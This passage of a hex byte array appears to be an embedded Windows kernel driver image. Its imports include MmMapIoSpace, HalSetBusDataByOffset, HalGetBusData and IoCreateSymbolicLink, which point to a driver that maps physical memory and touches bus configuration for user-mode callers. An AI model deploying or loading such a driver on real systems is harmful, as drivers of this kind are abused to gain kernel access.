0x16, 0x00, 0x00, 0xD8, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD8, 0x16, 0x00, 0x00, 0xA8, 0x18, 0x00, 0x00, 0x7F, 0x19, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x7F, 0x19, 0x00, 0x00, 0xB5, 0x19, 0x00, 0x00, 0x36, 0x1A, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x36, 0x1A, 0x00, 0x00, 0x6C, 0x1A, 0x00, 0x00, 0x24, 0x1B, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x24, 0x1B, 0x00, 0x00, 0x5A, 0x1B, 0x00, 0x00, 0x13, 0x1C, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x13, 0x1C, 0x00, 0x00, 0x68, 0x1C, 0x00, 0x00, 0x87, 0x1C, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x87, 0x1C, 0x00, 0x00, 0x95, 0x1C, 0x00, 0x00, 0xB4, 0x1C, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB4, 0x1C, 0x00, 0x00, 0xC2, 0x1C, 0x00, 0x00, 0xE1, 0x1C, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE1, 0x1C, 0x00, 0x00, 0x2E, 0x1D, 0x00, 0x00, 0x46, 0x1D, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x46, 0x1D, 0x00, 0x00, 0x54, 0x1D, 0x00, 0x00, 0x6C, 0x1D, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x6C, 0x1D, 0x00, 0x00, 0xA2, 0x1D, 0x00, 0x00, 0xC9, 0x1F, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xC9, 0x1F, 0x00, 0x00, 0xFF, 0x1F, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x3E, 0x21, 0x00, 0x00, 0x93, 0x21, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x93, 0x21, 0x00, 0x00, 0xC1, 0x21, 0x00, 0x00, 0x16, 0x22, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x16, 0x22, 0x00, 0x00, 0x4C, 0x22, 0x00, 0x00, 0x81, 0x25, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x81, 0x25, 0x00, 0x00, 0xB7, 0x25, 0x00, 0x00, 0xD2, 0x26, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD2, 0x26, 0x00, 0x00, 0x08, 0x27, 0x00, 0x00, 0xB6, 0x29, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x29, 0x00, 0x00, 0x1D, 0x2A, 0x00, 0x00, 0x95, 0x2B, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x95, 0x2B, 0x00, 0x00, 0xCB, 0x2B, 0x00, 0x00, 0x5E, 0x2E, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x2E, 0x00, 0x00, 0x94, 0x2E, 0x00, 0x00, 0x6F, 0x2F, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x6F, 0x2F, 0x00, 0x00, 0xA5, 0x2F, 0x00, 0x00, 0x19, 0x30, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x19, 0x30, 0x00, 0x00, 0x78, 0x30, 0x00, 0x00, 0x53, 0x32, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x53, 0x32, 0x00, 0x00, 0x89, 0x32, 0x00, 0x00, 0x13, 0x35, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x13, 0x35, 0x00, 0x00, 0x4C, 0x35, 0x00, 0x00, 0x4F, 0x37, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4F, 0x37, 0x00, 0x00, 0x77, 0x37, 0x00, 0x00, 0x93, 0x38, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x93, 0x38, 0x00, 0x00, 0xB8, 0x38, 0x00, 0x00, 0x9C, 0x3A, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x9C, 0x3A, 0x00, 0x00, 0xD2, 0x3A, 0x00, 0x00, 0x83, 0x3B, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x83, 0x3B, 0x00, 0x00, 0xB9, 0x3B, 0x00, 0x00, 0x60, 0x3F, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x60, 0x3F, 0x00, 0x00, 0x96, 0x3F, 0x00, 0x00, 0xDB, 0x41, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xDB, 0x41, 0x00, 0x00, 0x19, 0x25, 0x07, 0x00, 0x13, 0x64, 0x24, 0x00, 0x13, 0x34, 0x23, 0x00, 0x13, 0x01, 0x20, 0x00, 0x0C, 0x70, 0x00, 0x00, 0x94, 0x46, 0x00, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x01, 0x06, 0x02, 0x00, 0x06, 0x32, 0x02, 0x30, 0x01, 0x04, 0x01, 0x00, 0x04, 0x42, 0x00, 0x00, 0x01, 0x20, 0x0C, 0x00, 0x20, 0x64, 0x11, 0x00, 0x20, 0x54, 0x10, 0x00, 0x20, 0x34, 0x0E, 0x00, 0x20, 0x72, 0x1C, 0xF0, 0x1A, 0xE0, 0x18, 0xD0, 0x16, 0xC0, 0x14, 0x70, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0xA2, 0xDF, 0x2D, 0x99, 0x2B, 0x00, 0x00, 0xCD, 0x5D, 0x20, 0xD2, 0x66, 0xD4, 0xFF, 0xFF, 0x75, 0x98, 0x00, 0x00, 0x73, 0x98, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x10, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x4C, 0x54, 0x00, 0x00, 0x90, 0x10, 0x00, 0x00, 0xED, 0x10, 0x00, 0x00, 0x4C, 0x54, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x5C, 0x11, 0x00, 0x00, 0x4C, 0x54, 0x00, 0x00, 0x70, 0x11, 0x00, 0x00, 0xE8, 0x11, 0x00, 0x00, 0x08, 0x52, 0x00, 0x00, 0xF0, 0x11, 0x00, 0x00, 0x26, 0x12, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x30, 0x12, 0x00, 0x00, 0x70, 0x12, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x80, 0x12, 0x00, 0x00, 0x87, 0x13, 0x00, 0x00, 0x14, 0x52, 0x00, 0x00, 0x90, 0x13, 0x00, 0x00, 0x9C, 0x15, 0x00, 0x00, 0x30, 0x54, 0x00, 0x00, 0xB0, 0x15, 0x00, 0x00, 0x01, 0x44, 0x00, 0x00, 0x24, 0x52, 0x00, 0x00, 0x10, 0x44, 0x00, 0x00, 0x7F, 0x45, 0x00, 0x00, 0xE0, 0x51, 0x00, 0x00, 0x90, 0x45, 0x00, 0x00, 0xC0, 0x45, 0x00, 0x00, 0xD8, 0x51, 0x00, 0x00, 0xF8, 0x45, 0x00, 0x00, 0x1F, 0x46, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x28, 0x46, 0x00, 0x00, 0x8B, 0x46, 0x00, 0x00, 0x4C, 0x54, 0x00, 0x00, 0x94, 0x46, 0x00, 0x00, 0xB1, 0x46, 0x00, 0x00, 0x54, 0x54, 0x00, 0x00, 0xB8, 0x46, 0x00, 0x00, 0x26, 0x48, 0x00, 0x00, 0x5C, 0x54, 0x00, 0x00, 0x40, 0x48, 0x00, 0x00, 0x2A, 0x49, 0x00, 0x00, 0x78, 0x54, 0x00, 0x00, 0x40, 0x49, 0x00, 0x00, 0x58, 0x49, 0x00, 0x00, 0x80, 0x54, 0x00, 0x00, 0x60, 0x49, 0x00, 0x00, 0x61, 0x49, 0x00, 0x00, 0x84, 0x54, 0x00, 0x00, 0x70, 0x49, 0x00, 0x00, 0x71, 0x49, 0x00, 0x00, 0x88, 0x54, 0x00, 0x00, 0x64, 0x80, 0x00, 0x00, 0x82, 0x80, 0x00, 0x00, 0x54, 0x54, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x05, 0xF1, 0xE0, 0xFF, 0xFF, 0x48, 0xBA, 0x32, 0xA2, 0xDF, 0x2D, 0x99, 0x2B, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x05, 0x48, 0x3B, 0xC2, 0x75, 0x2F, 0x48, 0x8D, 0x0D, 0xD6, 0xE0, 0xFF, 0xFF, 0x48, 0xB8, 0x20, 0x03, 0x00, 0x00, 0x80, 0xF7, 0xFF, 0xFF, 0x48, 0x8B, 0x00, 0x48, 0x33, 0xC1, 0x48, 0xB9, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x48, 0x23, 0xC1, 0x48, 0x0F, 0x44, 0xC2, 0x48, 0x89, 0x05, 0xAE, 0xE0, 0xFF, 0xFF, 0x48, 0xF7, 0xD0, 0x48, 0x89, 0x05, 0xAC, 0xE0, 0xFF, 0xFF, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28, 0x4C, 0x8B, 0xC2, 0x4C, 0x8B, 0xC9, 0xE8, 0x95, 0xFF, 0xFF, 0xFF, 0x49, 0x8B, 0xD0, 0x49, 0x8B, 0xC9, 0x48, 0x83, 0xC4, 0x28, 0xE9, 0x0E, 0x93, 0xFF, 0xFF, 0xCC, 0xCC, 0xE8, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x82, 0x83, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, 0xC0, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x83, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAC, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDC, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9E, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB6, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x72, 0x83, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD2, 0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA8, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x00, 0x45, 0x78, 0x41, 0x6C, 0x6C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x50, 0x6F, 0x6F, 0x6C, 0x57, 0x69, 0x74, 0x68, 0x54, 0x61, 0x67, 0x00, 0xB9, 0x01, 0x49, 0x6F, 0x42, 0x75, 0x69, 0x6C, 0x64, 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6F, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0xE5, 0x01, 0x49, 0x6F, 0x44, 0x65, 0x6C, 0x65, 0x74, 0x65, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x69, 0x63, 0x4C, 0x69, 0x6E, 0x6B, 0x00, 0x00, 0x8B, 0x00, 0x45, 0x78, 0x46, 0x72, 0x65, 0x65, 0x50, 0x6F, 0x6F, 0x6C, 0x57, 0x69, 0x74, 0x68, 0x54, 0x61, 0x67, 0x00, 0x2B, 0x05, 0x52, 0x74, 0x6C, 0x41, 0x6E, 0x73, 0x69, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x54, 0x6F, 0x55, 0x6E, 0x69, 0x63, 0x6F, 0x64, 0x65, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0x00, 0xBA, 0x05, 0x52, 0x74, 0x6C, 0x49, 0x6E, 0x69, 0x74, 0x55, 0x6E, 0x69, 0x63, 0x6F, 0x64, 0x65, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0x00, 0xE3, 0x01, 0x49, 0x6F, 0x44, 0x65, 0x6C, 0x65, 0x74, 0x65, 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x00, 0x00, 0xF7, 0x02, 0x4B, 0x65, 0x49, 0x6E, 0x69, 0x74, 0x69, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x45, 0x76, 0x65, 0x6E, 0x74, 0x00, 0xB5, 0x05, 0x52, 0x74, 0x6C, 0x49, 0x6E, 0x69, 0x74, 0x41, 0x6E, 0x73, 0x69, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0xED, 0x03, 0x4D, 0x6D, 0x55, 0x6E, 0x6D, 0x61, 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 0x00, 0x00, 0xBE, 0x01, 0x49, 0x6F, 0x43, 0x61, 0x6E, 0x63, 0x65, 0x6C, 0x49, 0x72, 0x70, 0x00, 0x97, 0x05, 0x52, 0x74, 0x6C, 0x46, 0x72, 0x65, 0x65, 0x55, 0x6E, 0x69, 0x63, 0x6F, 0x64, 0x65, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0x00, 0x09, 0x02, 0x49, 0x6F, 0x47, 0x65, 0x74, 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x4F, 0x62, 0x6A, 0x65, 0x63, 0x74, 0x50, 0x6F, 0x69, 0x6E, 0x74, 0x65, 0x72, 0x00, 0x00, 0xCE, 0x03, 0x4D, 0x6D, 0x4D, 0x61, 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 0x00, 0x00, 0xA3, 0x02, 0x49, 0x6F, 0x66, 0x43, 0x6F, 0x6D, 0x70, 0x6C, 0x65, 0x74, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0x00, 0x87, 0x03, 0x4B, 0x65, 0x57, 0x61, 0x69, 0x74, 0x46, 0x6F, 0x72, 0x53, 0x69, 0x6E, 0x67, 0x6C, 0x65, 0x4F, 0x62, 0x6A, 0x65, 0x63, 0x74, 0x00, 0xF0, 0x04, 0x50, 0x73, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x00, 0x00, 0xD8, 0x01, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x69, 0x63, 0x4C, 0x69, 0x6E, 0x6B, 0x00, 0x00, 0x88, 0x04, 0x4F, 0x62, 0x66, 0x44, 0x65, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65, 0x6E, 0x63, 0x65, 0x4F, 0x62, 0x6A, 0x65, 0x63, 0x74, 0x00, 0x00, 0xCE, 0x01, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x00, 0x00, 0xA2, 0x02, 0x49, 0x6F, 0x66, 0x43, 0x61, 0x6C, 0x6C, 0x44, 0x72, 0x69, 0x76, 0x65, 0x72, 0x00, 0xC8, 0x02, 0x4B, 0x65, 0x42, 0x75, 0x67, 0x43, 0x68, 0x65, 0x63, 0x6B, 0x45, 0x78, 0x00, 0x00, 0x6E, 0x74, 0x6F, 0x73, 0x6B, 0x72, 0x6E, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x00, 0x4B, 0x65, 0x53, 0x74, 0x61, 0x6C, 0x6C, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x6F, 0x72, 0x00, 0x3A, 0x00, 0x48, 0x61, 0x6C, 0x53, 0x65, 0x74, 0x42, 0x75, 0x73, 0x44, 0x61, 0x74, 0x61, 0x42, 0x79, 0x4F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x00, 0x16, 0x00, 0x48, 0x61, 0x6C, 0x47, 0x65, 0x74, 0x42, 0x75, 0x73, 0x44, 0x61, 